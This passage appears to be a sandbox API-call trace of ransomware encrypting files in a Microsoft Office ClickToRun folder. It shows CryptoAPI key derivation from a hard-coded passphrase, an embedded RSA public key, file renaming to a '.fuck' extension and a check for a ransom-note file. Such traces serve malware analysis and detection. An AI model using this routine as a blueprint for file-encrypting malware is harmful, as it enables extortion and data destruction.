"c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash"), bFailIfExists=0) returned 0 [0235.424] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash", dwFileAttributes=0x0) returned 0 [0235.424] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash.gsg")) returned 0 [0235.424] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\s641033.hash.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\s641033.hash.fuck")) returned 0 [0235.424] CryptDestroyHash (hHash=0x27ebd20) returned 1 [0235.424] CryptDestroyKey (hKey=0x27ebc20) returned 1 [0235.424] CryptReleaseContext (hProv=0x2792550, dwFlags=0x0) returned 1 [0235.425] FindNextFileA (in: hFindFile=0x27eb8a0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.425] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.425] GetLastError () returned 0x5 [0235.425] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml")) returned 0x20 [0235.425] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml", dwFileAttributes=0x80) returned 0 [0235.425] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.426] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.426] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml.gsg", dwFileAttributes=0x2) returned 0 [0235.426] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2793100) returned 1 [0235.436] CryptCreateHash (in: hProv=0x2793100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.436] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.436] CryptHashData (hHash=0x27ebfa0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.436] CryptDeriveKey (in: hProv=0x2793100, Algid=0x6610, hBaseData=0x27ebfa0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27eb960) returned 1 [0235.437] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.437] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.437] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2792198) returned 1 [0235.439] CryptImportPublicKeyInfo (in: hCryptProv=0x2792198, dwCertEncodingType=0x1, pInfo=0x2797588*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27975b8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27975c0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebd20) returned 1 [0235.439] CryptEncrypt (in: hKey=0x27ebd20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.439] CryptEncrypt (in: hKey=0x27ebd20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2792550*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2792550*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.439] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2792550, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.439] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.439] CryptEncrypt (in: hKey=0x27eb960, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.439] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.439] CloseHandle (hObject=0xffffffff) returned 1 [0235.439] CloseHandle (hObject=0xffffffff) returned 1 [0235.439] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml"), bFailIfExists=0) returned 0 [0235.440] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml", dwFileAttributes=0x0) returned 0 [0235.440] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml.gsg")) returned 0 [0235.440] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.Platform.Culture.man.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.platform.culture.man.xml.fuck")) returned 0 [0235.440] CryptDestroyHash (hHash=0x27ebfa0) returned 1 [0235.441] CryptDestroyKey (hKey=0x27eb960) returned 1 [0235.441] CryptReleaseContext (hProv=0x2793100, dwFlags=0x0) returned 1 [0235.441] FindNextFileA (in: hFindFile=0x27eb8a0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.441] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.441] GetLastError () returned 0x5 [0235.441] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash")) returned 0x20 [0235.441] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash", dwFileAttributes=0x80) returned 0 [0235.441] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.441] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.442] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash.gsg", dwFileAttributes=0x2) returned 0 [0235.442] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e8cc8) returned 1 [0235.451] CryptCreateHash (in: hProv=0x27e8cc8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.451] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.451] CryptHashData (hHash=0x27eb8e0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.451] CryptDeriveKey (in: hProv=0x27e8cc8, Algid=0x6610, hBaseData=0x27eb8e0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27eba20) returned 1 [0235.451] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.451] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.451] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e84d0) returned 1 [0235.454] CryptImportPublicKeyInfo (in: hCryptProv=0x27e84d0, dwCertEncodingType=0x1, pInfo=0x2796138*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2796168*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2796170*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27eb860) returned 1 [0235.454] CryptEncrypt (in: hKey=0x27eb860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.454] CryptEncrypt (in: hKey=0x27eb860, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e85e0*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e85e0*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.455] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e85e0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.455] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.455] CryptEncrypt (in: hKey=0x27eba20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.455] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.455] CloseHandle (hObject=0xffffffff) returned 1 [0235.455] CloseHandle (hObject=0xffffffff) returned 1 [0235.455] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash"), bFailIfExists=0) returned 0 [0235.455] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash", dwFileAttributes=0x0) returned 0 [0235.456] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash.gsg")) returned 0 [0235.456] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.hash.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.hash.fuck")) returned 0 [0235.456] CryptDestroyHash (hHash=0x27eb8e0) returned 1 [0235.456] CryptDestroyKey (hKey=0x27eba20) returned 1 [0235.456] CryptReleaseContext (hProv=0x27e8cc8, dwFlags=0x0) returned 1 [0235.456] FindNextFileA (in: hFindFile=0x27eb8a0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0235.456] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0235.466] GetLastError () returned 0x5 [0235.466] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat")) returned 0x20 [0235.467] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x80) returned 0 [0235.467] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.467] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0235.468] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat.gsg", dwFileAttributes=0x2) returned 0 [0235.468] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x27e81a0) returned 1 [0235.477] CryptCreateHash (in: hProv=0x27e81a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0235.477] lstrlenA (lpString="eDbLtLOTzZPKVGRanogJIQSQzMlQm") returned 29 [0235.477] CryptHashData (hHash=0x27ebee0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0235.477] CryptDeriveKey (in: hProv=0x27e81a0, Algid=0x6610, hBaseData=0x27ebee0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x27eb9a0) returned 1 [0235.477] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0235.477] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0235.478] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x27e8dd8) returned 1 [0235.481] CryptImportPublicKeyInfo (in: hCryptProv=0x27e8dd8, dwCertEncodingType=0x1, pInfo=0x2796fd8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2797008*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2797010*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x27ebf20) returned 1 [0235.481] CryptEncrypt (in: hKey=0x27ebf20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0235.481] CryptEncrypt (in: hKey=0x27ebf20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27e8bb8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x27e8bb8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0235.481] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27e8bb8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.481] ReadFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x275a810, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0235.481] CryptEncrypt (in: hKey=0x27eb9a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x275a810*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0235.481] WriteFile (in: hFile=0xffffffff, lpBuffer=0x275a810, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0235.481] CloseHandle (hObject=0xffffffff) returned 1 [0235.481] CloseHandle (hObject=0xffffffff) returned 1 [0235.481] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat"), bFailIfExists=0) returned 0 [0235.482] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat", dwFileAttributes=0x0) returned 0 [0235.482] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat.gsg")) returned 0 [0235.482] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\stream.x64.en-us.man.dat.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\stream.x64.en-us.man.dat.fuck")) returned 0 [0235.483] CryptDestroyHash (hHash=0x27ebee0) returned 1 [0235.483] CryptDestroyKey (hKey=0x27eb9a0) returned 1 [0235.483] CryptReleaseContext (hProv=0x27e81a0, dwFlags=0x0) returned 1 [0235.483] FindNextFileA (in: hFindFile=0x27eb8a0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0235.483] FindClose (in: hFindFile=0x27eb8a0 | out: hFindFile=0x27eb8a0) returned 1 [0235.483] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\EDA58A0B-AD79-496A-8530-618D08767E60\\en-us.16\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\eda58a0b-ad79-496a-8530-618d08767e60\\en-us.16\\readme_back_files.htm")) returned 0xffffffff [0235.483] AreFileApisANSI () returned 1 [0235.483] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e8668, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 121 [0235.483] CreateFileW 